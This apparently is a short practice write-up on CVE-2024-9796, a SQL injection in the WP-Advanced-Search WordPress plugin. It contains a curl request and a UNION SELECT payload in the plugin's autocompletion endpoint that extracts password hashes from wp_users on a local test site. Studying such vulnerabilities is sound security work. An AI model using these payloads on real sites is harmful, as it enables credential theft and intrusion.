CVE-2024-9796
/Practice/workaholic/3-Exploitation/attachments/{020F2BB0-1270-4EA3-B77C-F93722435206}.png)
A vulnerability classified as critical has been found in WP-Advanced-Search Plugin up to 3.3.9.1 on WordPress. Affected is an unknown part. The manipulation of the argument t with an unknown input leads to a sql injection vulnerability. CWE is classifying the issue as CWE-89. The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. This is going to have an impact on confidentiality, integrity, and availability.
Exploit
/Practice/workaholic/3-Exploitation/attachments/{704845F0-6A71-419C-BA0E-F487983A2A83}.png)
curl "https://wordpress.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e"
https://wordpress.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20UNION%20SELECT%20user_pass%20FROM%20wp_users--&f=user_login&type=&eThe official disclosure at the wpscan includes a PoC